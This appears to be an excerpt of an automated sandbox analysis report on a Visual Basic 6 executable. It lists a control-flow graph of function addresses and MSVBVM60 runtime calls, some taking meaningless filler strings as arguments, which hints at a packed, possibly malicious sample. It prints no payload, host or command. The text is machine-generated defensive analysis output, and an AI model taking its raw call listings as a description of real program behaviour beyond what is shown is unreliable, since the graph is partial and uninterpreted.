42049d __vbaFreeStrList __vbaFreeVarList 1450->1451 1452 420502 1451->1452 1453 420531 1452->1453 1454 420511 __vbaHresultCheckObj 1452->1454 1455 42057c 1453->1455 1456 42055c __vbaHresultCheckObj 1453->1456 1454->1453 1457 420583 7 API calls 1455->1457 1456->1457 1458 42067d __vbaStrMove __vbaFreeStrList __vbaFreeVarList #696 1457->1458 1524 4261e8 6 API calls 1458->1524 1459 420722 1460 42076c 1459->1460 1461 42074c __vbaHresultCheckObj 1459->1461 1461->1460 1468 422817 1467->1468 1469 422804 __vbaHresultCheck 1467->1469 1470 42281e __vbaVarTstGe __vbaFreeVarList 1468->1470 1469->1470 1471 422867 13 API calls 1470->1471 1472 422948 __vbaStrCopy 1470->1472 1471->1472 1473 422995 __vbaFreeStr __vbaFreeStr 1472->1473 1473->1406 1475 422a03 #614 __vbaFpR8 1474->1475 1476 422a27 9 API calls 1475->1476 1477 422aae #541 #522 #573 __vbaVarTstNe __vbaFreeVarList 1475->1477 1476->1477 1478 422c72 __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 1477->1478 1479 422b21 19 API calls 1477->1479 1478->1407 1479->1478 1482 424124 14 API calls 1481->1482 1483 4241e8 8 API calls 1481->1483 1482->1483 1484 424284 #628 __vbaStrMove 1483->1484 1485 4244dc 8 API calls 1483->1485 1487 4242d0 1484->1487 1488 4242b5 __vbaNew2 1484->1488 1485->1419 1489 42432e 1487->1489 1490 42430e __vbaHresultCheckObj 1487->1490 1488->1487 1491 424335 __vbaStrMove 1489->1491 1490->1491 1492 424370 1491->1492 1493 424381 __vbaHresultCheckObj 1492->1493 1494 4243a4 1492->1494 1495 4243ab __vbaFreeStrList __vbaFreeObj __vbaFreeVar 1493->1495 1494->1495 1496 4243f1 1495->1496 1497 4243d6 __vbaNew2 1495->1497 1498 42444f 1496->1498 1499 42442f __vbaHresultCheckObj 1496->1499 1497->1496 1500 42448b __vbaHresultCheckObj 1498->1500 1501 4244ae 1498->1501 1499->1498 1502 4244b5 __vbaFreeObj #537 __vbaStrMove 1500->1502 1501->1502 1502->1485 1504 4245b6 11 API calls 1503->1504 1505 424683 #574 __vbaStrMove 1504->1505 1506 4248d1 __vbaFreeStr __vbaFreeObj __vbaFreeStr __vbaFreeStr 1504->1506 1507 4246c8 1505->1507 1508 4246ad __vbaNew2 1505->1508 1506->1420 1510 424726 1507->1510 1511 424706 __vbaHresultCheckObj 1507->1511 1508->1507 1512 42472d __vbaStrMove 1510->1512 1511->1512 1513 424768 1512->1513 1514 424779 __vbaHresultCheckObj 1513->1514 1515 42479c 1513->1515 1516 4247a3 __vbaFreeStrList __vbaFreeObj __vbaFreeVar 1514->1516 1515->1516 1517 4247e9 1516->1517 1518 4247ce __vbaNew2 1516->1518 1519 424847 1517->1519 1520 424827 __vbaHresultCheckObj 1517->1520 1518->1517 1521 424883 __vbaHresultCheckObj 1519->1521 1522 4248a6 1519->1522 1520->1519 1523 4248ad __vbaFreeObj #537 __vbaStrMove 1521->1523 1522->1523 1523->1506 1525 42639b #586 1524->1525 1526 42627d 1524->1526 1527 4263df __vbaFreeStr 1525->1527 1528 426286 __vbaNew2 1526->1528 1529 42629e 1526->1529 1527->1459 1528->1529 1530 4262c7 __vbaHresultCheckObj 1529->1530 1531 4262de 1529->1531 1530->1531 1532 426322 1531->1532 1533 426305 __vbaHresultCheckObj 1531->1533 1534 426329 __vbaI2I4 __vbaFreeObj 1532->1534 1533->1534 1535 426405 __vbaErrorOverflow 1534->1535 1536 42634b __vbaVarDup #619 __vbaStrVarMove __vbaStrMove __vbaFreeVarList 1534->1536 1536->1525 1800 424cca __vbaChkstk #586 1801 422ce9 __vbaChkstk __vbaStrCopy #538 1802 422d40 1801->1802 1803 422d48 _adj_fdiv_m64 1801->1803 1804 422d62 1802->1804 1805 422d6a _adj_fdiv_m64 1802->1805 1803->1802 1806 422d88 __vbaVarTstGe __vbaFreeVar 1804->1806 1807 422ffd 1804->1807 1805->1804 1808 422db4 #717 __vbaStrVarMove __vbaStrMove __vbaFreeVar 1806->1808 1809 422f8b __vbaAryDestruct __vbaFreeStr __vbaFreeStr __vbaFreeStr 1806->1809 1807->1807 1811 422df6 __vbaNew2 1808->1811 1812 422e0e 1808->1812 1811->1812 1813 422e51 1812->1813 1814 422e37 __vbaHresultCheckObj 1812->1814 1815 422e7b __vbaHresultCheckObj 1813->1815 1816 422e98 1813->1816 1814->1813 1817 422e9f __vbaI2I4 __vbaFreeObj 1815->1817 1816->1817 1818 422ebc __vbaNew2 1817->1818 1819 422ed7 1817->1819 1818->1819 1820 422f20 1819->1820 1821 422f06 __vbaHresultCheckObj 1819->1821 1822 422f67 1820->1822 1823 422f4a __vbaHresultCheckObj 1820->1823 1821->1820 1824 422f6e __vbaStrMove __vbaFreeObj 1822->1824 1823->1824 1824->1809 1542 424e6f __vbaChkstk 1543 424eb1 __vbaStrCopy __vbaAryConstruct2 1542->1543 1544 424ed6 1543->1544 1545 424edc __vbaGenerateBoundsError 1543->1545 1546 424ee4 6 API calls 1544->1546 1545->1546 1547 424f45 __vbaGenerateBoundsError 1546->1547 1548 424f3c 1546->1548 1549 424f50 __vbaStrCopy #588 1547->1549 1548->1549 1550 424f85 1549->1550 1551 424f8e __vbaGenerateBoundsError 1549->1551 1552 424f99 #574 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 1550->1552 1551->1552 1553 424fe2 __vbaGenerateBoundsError 1552->1553 1554 424fd9 1552->1554 1555 424fed __vbaStrCopy 1553->1555 1554->1555 1556 425022 1555->1556 1557 42502b __vbaGenerateBoundsError 1555->1557 1558 425036 #703 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 1556->1558 1557->1558 1559 425087 __vbaGenerateBoundsError 1558->1559 1560 42507e 1558->1560 1561 425092 __vbaStrCopy 1559->1561 1560->1561 1562 4250b2 1561->1562 1563 4250bb __vbaGenerateBoundsError 1561->1563 1564 4250c6 __vbaStrCopy 1562->1564 1563->1564 1565 4250e6 1564->1565 1566 4250ef __vbaGenerateBoundsError 1564->1566 1567 4250fa __vbaStrCopy 1565->1567 1566->1567 1568 425123 __vbaGenerateBoundsError 1567->1568 1569 42511a 1567->1569 1570 42512e #616 __vbaStrMove __vbaStrCopy __vbaFreeStr 1568->1570 1569->1570 1571 425175 __vbaGenerateBoundsError 1570->1571 1572 42516c 1570->1572 1573 425180 __vbaStrCopy 1571->1573 1572->1573 1574 4251a0 1573->1574 1575 4251a9 __vbaGenerateBoundsError 1573->1575 1576 4251b4 __vbaStrCopy 1574->1576 1575->1576 1577 4251d4 1576->1577 1578 4251dd __vbaGenerateBoundsError 1576->1578 1579 4251e8 __vbaStrCopy 1577->1579 1578->1579 1580 425211 __vbaGenerateBoundsError 1579->1580 1581 425208 1579->1581 1582 42521c __vbaStrCopy 1580->1582 1581->1582 1583 425245 __vbaGenerateBoundsError 1582->1583 1584 42523c 1582->1584 1585 425250 __vbaStrCopy #541 1583->1585 1584->1585 1586 425287 __vbaGenerateBoundsError 1585->1586 1587 42527e 1585->1587 1588 425292 7 API calls 1586->1588 1587->1588 1589 425301 __vbaGenerateBoundsError 1588->1589 1590 4252f8 1588->1590 1591 42530c __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVarList 1589->1591 1590->1591 1592 425356 1591->1592 1593 42535f __vbaGenerateBoundsError 1591->1593 1594 42536a __vbaStrCopy #539 1592->1594 1593->1594 1595 4253a8 __vbaGenerateBoundsError 1594->1595 1596 42539f 1594->1596 1597 4253b3 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 1595->1597 1596->1597 1598 4253f3 1597->1598 1599 4253fc __vbaGenerateBoundsError 1597->1599 1600 425407 __vbaStrCopy 1598->1600 1599->1600 1601 425430 __vbaGenerateBoundsError 1600->1601 1602 425427 1600->1602 1603 42543b #669 __vbaStrMove __vbaStrCopy __vbaFreeStr 1601->1603 1602->1603 1604 425478 __vbaGenerateBoundsError 1603->1604 1605 42546f 1603->1605 1606 425483 __vbaStrCopy #575 1604->1606 1605->1606 1607 4254c7 __vbaGenerateBoundsError 1606->1607 1608 4254be 1606->1608 1609 4254d2 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVarList 1607->1609 1608->1609 1610 42553b __vbaFreeStr __vbaAryDestruct 1609->1610 1847 42494d __vbaChkstk 1848 42498d __vbaStrCopy __vbaVarDup #705 __vbaStrMove __vbaFreeVar 1847->1848 1849 4249e5 __vbaFreeStr __vbaFreeStr 1848->1849 1539 401250 1540 4012e6 __vbaExceptHandler 1539->1540 1862 423536 __vbaChkstk 1863 423578 __vbaStrCopy __vbaAryConstruct2 #573 __vbaVarTstEq __vbaFreeVarList 1862->1863 1864 423fe6 __vbaFreeStr __vbaAryDestruct __vbaFreeStr __vbaFreeStr 1863->1864 1865 4235fa 1863->1865 1866 423613 __vbaGenerateBoundsError 1865->1866 1867 42360a 1865->1867 1866->1867 1869 423641 1867->1869 1870 42364a __vbaGenerateBoundsError 1867->1870 1871 423655 __vbaR8FixI4 1869->1871 1870->1871 1872 423688 __vbaGenerateBoundsError 1871->1872 1873 42367f 1871->1873 1874 423693 __vbaR8FixI4 1872->1874 1873->1874 1875 4236c6 __vbaGenerateBoundsError 1874->1875 1876 4236bd 1874->1876 1875->1876 1877 4236f4 1876->1877 1878 4236fd __vbaGenerateBoundsError 1876->1878 1879 423708 __vbaLenBstr 1877->1879 1878->1879 1880 423731 1879->1880 1881 42373a __vbaGenerateBoundsError 1879->1881 1882 423745 __vbaR8IntI4 1880->1882 1881->1882 1883 423778 __vbaGenerateBoundsError 1882->1883 1884 42376f 1882->1884 1885 423783 __vbaR8FixI4 1883->1885 1884->1885 1886 4237b6 __vbaGenerateBoundsError 1885->1886 1887 4237ad 1885->1887 1886->1887 1888 4237e4 1887->1888 1889 4237ed __vbaGenerateBoundsError 1887->1889 1890 4237f8 __vbaLenBstr #535 #564 1888->1890 1889->1890 1891 423845 __vbaHresultCheck 1890->1891 1892 423858 1890->1892 1891->1892 1893 423872 1892->1893 1894 42387b __vbaGenerateBoundsError 1892->1894 1895 423886 __vbaI4Var __vbaFreeVarList 1893->1895 1894->1895 1896 4238c0 1895->1896 1897 4238c9 __vbaGenerateBoundsError 1895->1897 1898 4238d4 #588 1896->1898 1897->1898 1899 423907 __vbaGenerateBoundsError 1898->1899 1900 4238fe 1898->1900 1899->1900 1901 423935 1900->1901 1902 42393e __vbaGenerateBoundsError 1900->1902 1903 423949 __vbaLenBstrB 1901->1903 1902->1903 1904 423972 1903->1904 1905 42397b __vbaGenerateBoundsError 1903->1905 1906 4239b2 __vbaGenerateBoundsError 1904->1906 1907 4239a9 1904->1907 1905->1904 1908 4239bd #584 #564 1906->1908 1907->1908 1909 423a22 1908->1909 1910 423a0f __vbaHresultCheck 1908->1910 1911 423a45 __vbaGenerateBoundsError 1909->1911 1912 423a3c 1909->1912 1910->1909 1913 423a50 __vbaI4Var __vbaFreeVarList 1911->1913 1912->1913 1914 423a93 __vbaGenerateBoundsError 1913->1914 1915 423a8a 1913->1915 1914->1915 1916 423ac1 1915->1916 1917 423aca __vbaGenerateBoundsError 1915->1917 1918 423ad5 #685 __vbaObjSet 1916->1918 1917->1918 1919 423b12 1918->1919 1920 423b43 1919->1920 1921 423b23 __vbaHresultCheckObj 1919->1921 1922 423b66 __vbaGenerateBoundsError 1920->1922 1923 423b5d 1920->1923 1921->1920 1924 423b71 __vbaFreeObj 1922->1924 1923->1924 1925 423ba7 __vbaGenerateBoundsError 1924->1925 1926 423b9e 1924->1926 1927 423bb2 #587 #564 1925->1927 1926->1927 1928 423c17 1927->1928 1929 423c04 __vbaHresultCheck 1927->1929 1930 423c31 1928->1930 1931 423c3a __vbaGenerateBoundsError 1928->1931 1929->1928 1932 423c45 __vbaI4Var __vbaFreeVarList 1930->1932 1931->1932 1933 423c96 __vbaGenerateBoundsError 1932->1933 1934 423c8d 1932->1934 1935 423ca1 #536 __vbaStrMove __vbaLenBstr __vbaFreeStr __vbaFreeVar 1933->1935 1934->1935 1936 423cf2 __vbaGenerateBoundsError 1935->1936 1937 423ce9 1935->1937 1938 423cfd __vbaLenBstrB 1936->1938 1937->1938 1939 423d26 1938->1939 1940 423d2f __vbaGenerateBoundsError 1938->1940 1941 423d66 __vbaGenerateBoundsError 1939->1941 1942 423d5d 1939->1942 1940->1939 1943 423d71 #564 1941->1943 1942->1943 1944 423dc0 1943->1944 1945 423dad __vbaHresultCheck 1943->1945 1946 423de3 __vbaGenerateBoundsError 1944->1946 1947 423dda 1944->1947 1945->1944 1948 423dee __vbaI4Var __vbaFreeVarList 1946->1948 1947->1948 1949 423e31 __vbaGenerateBoundsError 1948->1949 1950 423e28 1948->1950 1949->1950 1951 423e68 __vbaGenerateBoundsError 1950->1951 1952 423e5f 1950->1952 1951->1952 1953 423e96 1952->1953 1954 423e9f __vbaGenerateBoundsError 1952->1954 1955 423eaa #588 1953->1955 1954->1955 1956 423ee6 __vbaGenerateBoundsError 1955->1956 1957 423edd 1955->1957 1956->1957 1958 423f14 1957->1958 1959 423f1d __vbaGenerateBoundsError 1957->1959 1960 423f54 __vbaGenerateBoundsError 1958->1960 1961 423f4b 1958->1961 1959->1958 1962 423f5f 9 API calls 1960->1962 1961->1962 1962->1864 1850 425574 __vbaChkstk 1851 4255bd 6 API calls 1850->1851 1852 425793 #648 __vbaFreeVar 1851->1852 1853 42561e __vbaVarDup #632 __vbaStrVarMove __vbaStrMove __vbaFreeVarList 1851->1853 1856 4257e5 __vbaFreeStr __vbaFreeStr 1852->1856 1854 4256a8 1853->1854 1855 42568d __vbaNew2 1853->1855 1857 425706 1854->1857 1858 4256e6 __vbaHresultCheckObj 1854->1858 1855->1854 1859 425762 1857->1859 1860 42573f __vbaHresultCheckObj 1857->1860 1858->1857 1861 425769 __vbaStrMove __vbaFreeObj __vbaOnError 1859->1861 1860->1861 1861->1852 1789 425e3b 7 API calls 1790 425f02 14 API calls 1789->1790 1791 426138 __vbaStrCopy 1789->1791 1793 426042 __vbaNew2 1790->1793 1794 42605d 1790->1794 1792 4261a9 __vbaAryDestruct __vbaFreeStr __vbaFreeStr __vbaFreeStr 1791->1792 1793->1794 1795 4260bb 1794->1795 1796 42609b __vbaHresultCheckObj 1794->1796 1797 4260f7 __vbaHresultCheckObj 1795->1797 1798 42611a 1795->1798 1796->1795 1799 426121 __vbaI2I4 __vbaFreeObj 1797->1799 1798->1799 1799->1791 1537 40195c #100 1538 401a16 1537->1538 1825 424cfe __vbaChkstk 1826 424d3e #539 __vbaStrVarMove __vbaStrMove __vbaFreeVar 1825->1826 1827 424d7e __vbaFreeStr 1826->1827 1775 42581f 7 API calls 1776 4258d5 __vbaFreeStr __vbaAryDestruct 1775->1776 1611 42087c __vbaChkstk __vbaStrCopy __vbaAryConstruct2 __vbaInStr 1612 4225eb __vbaOnError __vbaStrCopy 1611->1612 1613 42090d #648 __vbaFreeVar 1611->1613 1616 42268c 19 API calls 1612->1616 1614 420bd7 #648 __vbaFreeVar 1613->1614 1615 420988 1613->1615 1619 420f12 #648 __vbaFreeVar 1614->1619 1620 420c2d 1614->1620 1617 4209b3 1615->1617 1618 420998 __vbaNew2 1615->1618 1633 420a14 1617->1633 1634 4209f4 __vbaHresultCheckObj 1617->1634 1618->1617 1621 421101 1619->1621 1622 420f68 __vbaVarDup #606 __vbaStrMove __vbaFreeVar 1619->1622 1623 420c58 1620->1623 1624 420c3d __vbaNew2 1620->1624 1625 421117 #648 __vbaFreeVar 1621->1625 1626 42125a 1621->1626 1627 420fe5 1622->1627 1628 420fca __vbaNew2 1622->1628 1639 420c99 __vbaHresultCheckObj 1623->1639 1656 420cb9 1623->1656 1624->1623 1631 421178 1625->1631 1632 42115d __vbaNew2 1625->1632 1629 421270 __vbaVarDup #705 __vbaStrMove __vbaFreeVar 1626->1629 1630 4213de 1626->1630 1643 421026 __vbaHresultCheckObj 1627->1643 1666 421046 1627->1666 1628->1627 1637 4212d2 __vbaNew2 1629->1637 1638 4212ed 1629->1638 1635 4213f4 #593 __vbaFreeVar 1630->1635 1636 421539 1630->1636 1648 4211b9 __vbaHresultCheckObj 1631->1648 1655 4211d9 1631->1655 1632->1631 1661 420a53 __vbaHresultCheckObj 1633->1661 1662 420a76 1633->1662 1634->1633 1642 421439 __vbaNew2 1635->1642 1665 421454 1635->1665 1640 421bf1 1636->1640 1641 42154f 1636->1641 1637->1638 1653 42134e 1638->1653 1654 42132e __vbaHresultCheckObj 1638->1654 1639->1656 1646 421e62 1640->1646 1647 421c07 8 API calls 1640->1647 1644 421566 1641->1644 1645 42156f __vbaGenerateBoundsError 1641->1645 1642->1665 1643->1666 1649 42157a __vbaStrCopy 1644->1649 1645->1649 1650 4220a4 1646->1650 1651 421e78 __vbaVarDup #629 __vbaStrVarMove __vbaStrMove __vbaFreeVarList 1646->1651 1652 421cb8 __vbaNew2 1647->1652 1677 421cd3 1647->1677 1648->1655 1659 4215b3 __vbaGenerateBoundsError 1649->1659 1660 4215aa 1649->1660 1657 422572 6 API calls 1650->1657 1658 4220ba 63 API calls 1650->1658 1663 421f37 1651->1663 1664 421f1c __vbaNew2 1651->1664 1652->1677 1691 4213b0 1653->1691 1692 42138d __vbaHresultCheckObj 1653->1692 1654->1653 1685 421235 1655->1685 1686 421215 __vbaHresultCheckObj 1655->1686 1669 420d15 1656->1669 1670 420cf5 __vbaHresultCheckObj 1656->1670 1657->1612 1658->1657 1671 4215be __vbaStrCopy __vbaVarDup #513 1659->1671 1660->1671 1672 420a7d __vbaStrMove __vbaFreeObj 1661->1672 1662->1672 1689 421f98 1663->1689 1690 421f78 __vbaHresultCheckObj 1663->1690 1664->1663 1667 4214b5 1665->1667 1668 421495 __vbaHresultCheckObj 1665->1668 1678 421085 __vbaHresultCheckObj 1666->1678 1679 4210a8 1666->1679 1696 421517 1667->1696 1697 4214f4 __vbaHresultCheckObj 1667->1697 1668->1667 1680 420d1c 19 API calls 1669->1680 1670->1680 1673 421634 __vbaGenerateBoundsError 1671->1673 1674 42162b 1671->1674 1675 420ad4 1672->1675 1676 420ab9 __vbaNew2 1672->1676 1681 42163f __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVarList 1673->1681 1674->1681 1698 420b35 1675->1698 1699 420b15 __vbaHresultCheckObj 1675->1699 1676->1675 1683 421d34 1677->1683 1684 421d14 __vbaHresultCheckObj 1677->1684 1682 4210af __vbaStrMove __vbaFreeObj #525 __vbaStrMove 1678->1682 1679->1682 1680->1657 1687 4216b1 __vbaGenerateBoundsError 1681->1687 1688 4216a8 1681->1688 1682->1657 1704 421d73 __vbaHresultCheckObj 1683->1704 1705 421d96 1683->1705 1684->1683 1693 42123c __vbaFreeObj 1685->1693 1686->1693 1694 4216bc __vbaStrCopy 1687->1694 1688->1694 1706 421fd7 __vbaHresultCheckObj 1689->1706 1707 421ffa 1689->1707 1690->1689 1695 4213b7 __vbaFreeObj #598 1691->1695 1692->1695 1693->1657 1700 421713 __vbaGenerateBoundsError 1694->1700 1701 42170a 1694->1701 1695->1657 1702 42151e __vbaFreeObj 1696->1702 1697->1702 1713 420b91 1698->1713 1714 420b71 __vbaHresultCheckObj 1698->1714 1699->1698 1703 42171e #703 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 1700->1703 1701->1703 1702->1657 1708 421782 1703->1708 1709 42178b __vbaGenerateBoundsError 1703->1709 1710 421d9d 7 API calls 1704->1710 1705->1710 1711 422001 7 API calls 1706->1711 1707->1711 1712 421796 #618 __vbaStrMove __vbaStrCopy __vbaFreeStr 1708->1712 1709->1712 1710->1657 1711->1657 1715 4217f3 __vbaGenerateBoundsError 1712->1715 1716 4217ea 1712->1716 1717 420b98 __vbaFreeObj __vbaStrCat __vbaStrMove 1713->1717 1714->1717 1718 4217fe __vbaStrCopy 1715->1718 1716->1718 1717->1657 1719 421837 __vbaGenerateBoundsError 1718->1719 1720 42182e 1718->1720 1721 421842 __vbaStrCopy 1719->1721 1720->1721 1722 421872 1721->1722 1723 42187b __vbaGenerateBoundsError 1721->1723 1724 421886 __vbaStrCopy 1722->1724 1723->1724 1725 4218d3 __vbaGenerateBoundsError 1724->1725 1726 4218ca 1724->1726 1727 4218de #651 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 1725->1727 1726->1727 1728 421943 __vbaGenerateBoundsError 1727->1728 1729 42193a 1727->1729 1730 42194e 6 API calls 1728->1730 1729->1730 1731 4219c4 1730->1731 1732 4219cd __vbaGenerateBoundsError 1730->1732 1733 4219d8 __vbaStrMove #616 __vbaStrMove __vbaStrCopy __vbaFreeStrList 1731->1733 1732->1733 1734 421a53 __vbaGenerateBoundsError 1733->1734 1735 421a4a 1733->1735 1736 421a5e __vbaStrCopy 1734->1736 1735->1736 1737 421a97 __vbaGenerateBoundsError 1736->1737 1738 421a8e 1736->1738 1739 421aa2 __vbaStrCopy 1737->1739 1738->1739 1740 421ad2 1739->1740 1741 421adb __vbaGenerateBoundsError 1739->1741 1742 421ae6 __vbaStrCopy 1740->1742 1741->1742 1743 421b16 1742->1743 1744 421b1f __vbaGenerateBoundsError 1742->1744 1745 421b2a #512 __vbaStrMove __vbaStrCopy __vbaFreeStr 1743->1745 1744->1745 1746 421b84 __vbaGenerateBoundsError 1745->1746 1747 421b7b 1745->1747 1748 421b8f __vbaStrCopy __vbaOnError __vbaRedim __vbaUbound 1746->1748 1747->1748 1748->1657 1828 4258fc __vbaChkstk 1829 42593e #608 __vbaVarDup #518 __vbaVarTstNe __vbaFreeVarList 1828->1829 1830 425ba0 __vbaFreeStr __vbaFreeStr 1829->1830 1831 4259a5 1829->1831 1832 4259ae __vbaNew2 1831->1832 1834 4259c9 1831->1834 1832->1834 1835 425a1b 1834->1835 1836 4259fe __vbaHresultCheckObj 1834->1836 1837 425a77 1835->1837 1838 425a54 __vbaHresultCheckObj 1835->1838 1836->1835 1839 425a7e __vbaFreeObj #616 __vbaStrMove 1837->1839 1838->1839 1840 425ac8 1839->1840 1841 425aad __vbaNew2 1839->1841 1842 425b1a 1840->1842 1843 425afd __vbaHresultCheckObj 1840->1843 1841->1840 1844 425b53 __vbaHresultCheckObj 1842->1844 1845 425b76 1842->1845 1843->1842 1846 425b7d __vbaStrMove __vbaFreeObj 1844->1846 1845->1846 1846->1830 1777 424a1d __vbaChkstk 1778 424a5d 8 API calls 1777->1778 1779 424c40 __vbaFreeStr __vbaAryDestruct __vbaFreeStr 1778->1779 1780 424acb 10 API calls 1778->1780 1782 424b95 1780->1782 1783 424b7a __vbaNew2 1780->1783 1784 424bc4 __vbaHresultCheckObj 1782->1784 1785 424bde 1782->1785 1783->1782 1784->1785 1786 424c25 1785->1786 1787 424c08 __vbaHresultCheckObj 1785->1787 1788 424c2c __vbaI2I4 __vbaFreeObj 1786->1788 1787->1788 1788->1779

                                                                                                    Executed Functions

                                                                                                    Function 0041FAC7, Relevance: 210.8, APIs: 87, Strings: 33, Instructions: 770COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 41fac7-41fb27 __vbaChkstk #709 2 41fb2d-41fbfc #588 __vbaStrI4 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList #669 __vbaStrMove __vbaVarDup #528 __vbaStrVarMove __vbaStrMove __vbaFreeVarList 0->2 3 41fbff-41fd35 #575 __vbaStrVarVal __vbaStrMove __vbaFreeStr __vbaFreeVarList __vbaStrCopy * 2 call 422770 __vbaStrMove __vbaFreeStrList call 4229c1 0->3 2->3 7 41fd57 3->7 8 41fd37-41fd55 __vbaHresultCheckObj 3->8 9 41fd5e-41fdf0 __vbaStrCopy 7->9 8->9 12 41fe12 9->12 13 41fdf2-41fe10 __vbaHresultCheckObj 9->13 14 41fe19-41fea6 __vbaFreeStr __vbaVarDup #518 __vbaStrCopy __vbaStrVarVal 12->14 13->14 16 41fec8 14->16 17 41fea8-41fec6 __vbaHresultCheckObj 14->17 18 41fecf-41ffe1 __vbaFreeStrList __vbaFreeVarList call 424074 #696 #616 __vbaStrMove __vbaStrCopy __vbaStrMove call 424574 16->18 17->18 21 420003 18->21 22 41ffe3-420001 __vbaHresultCheckObj 18->22 23 42000a-420082 __vbaFreeStrList __vbaLenBstrB __vbaLenBstr 21->23 22->23 25 4200a4 23->25 26 420084-4200a2 __vbaHresultCheckObj 23->26 27 4200ab-420108 #648 25->27 26->27 29 42012a 27->29 30 42010a-420128 __vbaHresultCheckObj 27->30 31 420131-4201cf __vbaFreeVar #517 __vbaStrMove * 2 __vbaFreeStrList 29->31 30->31 34 4201f1 31->34 35 4201d1-4201ef __vbaHresultCheckObj 31->35 36 4201f8-420248 #696 #685 __vbaObjSet 34->36 35->36 38 42026a 36->38 39 42024a-420268 __vbaHresultCheckObj 36->39 40 420271-4202dc __vbaStrCopy 38->40 39->40 42 4202fe 40->42 43 4202de-4202fc __vbaHresultCheckObj 40->43 44 420305-420373 __vbaStrMove __vbaFreeStr __vbaFreeObj 42->44 43->44 46 420395 44->46 47 420375-420393 __vbaHresultCheckObj 44->47 48 42039c-4203d3 46->48 47->48 50 4203f5 48->50 51 4203d5-4203f3 __vbaHresultCheckObj 48->51 52 4203fc-42050f #573 __vbaStrVarMove __vbaStrMove __vbaStrCopy #648 __vbaFreeStrList __vbaFreeVarList 50->52 51->52 55 420531 52->55 56 420511-42052f __vbaHresultCheckObj 52->56 57 420538-42055a 55->57 56->57 59 42057c 57->59 60 42055c-42057a __vbaHresultCheckObj 57->60 61 420583-42071c __vbaVarDup #629 #704 __vbaStrMove __vbaStrVarMove __vbaStrMove * 3 __vbaFreeStrList __vbaFreeVarList #696 call 4261e8 59->61 60->61 63 420722-42074a 61->63 65 42076c 63->65 66 42074c-42076a __vbaHresultCheckObj 63->66 67 420773-420790 65->67 66->67
                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 0041FAE5
                                                                                                    • #709.MSVBVM60(spillelrernes,tunesere,000000FF,00000000,?,?,?,?,004015F6), ref: 0041FB1D
                                                                                                    • #588.MSVBVM60(00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000,?,?,?,?,004015F6), ref: 0041FB39
                                                                                                    • __vbaStrI4.MSVBVM60(00000000,00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000,?,?,?,?,004015F6), ref: 0041FB3F
                                                                                                    • __vbaStrMove.MSVBVM60(00000000,00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000,?,?,?,?,004015F6), ref: 0041FB49
                                                                                                    • __vbaStrCat.MSVBVM60(bindsaalers,00000000,00000000,00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000,?,?,?,?,004015F6), ref: 0041FB54
                                                                                                    • __vbaStrMove.MSVBVM60(bindsaalers,00000000,00000000,00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000,?,?,?,?,004015F6), ref: 0041FB5E
                                                                                                    • __vbaStrCat.MSVBVM60(muscularise,00000000,bindsaalers,00000000,00000000,00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000), ref: 0041FB69
                                                                                                    • __vbaStrMove.MSVBVM60(muscularise,00000000,bindsaalers,00000000,00000000,00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000), ref: 0041FB73
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,muscularise,00000000,bindsaalers,00000000,00000000,00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000), ref: 0041FB82
                                                                                                    • #669.MSVBVM60(?,?,004015F6), ref: 0041FB8A
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,004015F6), ref: 0041FB94
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 0041FBB9
                                                                                                    • #528.MSVBVM60(?,?), ref: 0041FBCC
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041FBD8
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,?), ref: 0041FBE2
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041FBF7
                                                                                                    • #575.MSVBVM60(?,00000003), ref: 0041FC21
                                                                                                    • __vbaStrVarVal.MSVBVM60(?,?,005A2ED7,005E0D92,0000012F,?), ref: 0041FC5C
                                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041FC86
                                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041FC8E
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,00000003,?), ref: 0041FCA3
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,004015F6), ref: 0041FCB3
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,004015F6), ref: 0041FCC0
                                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041FD03
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041FD12
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,000006FC), ref: 0041FD4A
                                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041FDC0
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000700), ref: 0041FE05
                                                                                                    • __vbaFreeStr.MSVBVM60(00000000,00401260,0040364C,00000700), ref: 0041FE25
                                                                                                    • __vbaVarDup.MSVBVM60(00000000,00401260,0040364C,00000700), ref: 0041FE4A
                                                                                                    • #518.MSVBVM60(?,?), ref: 0041FE5D
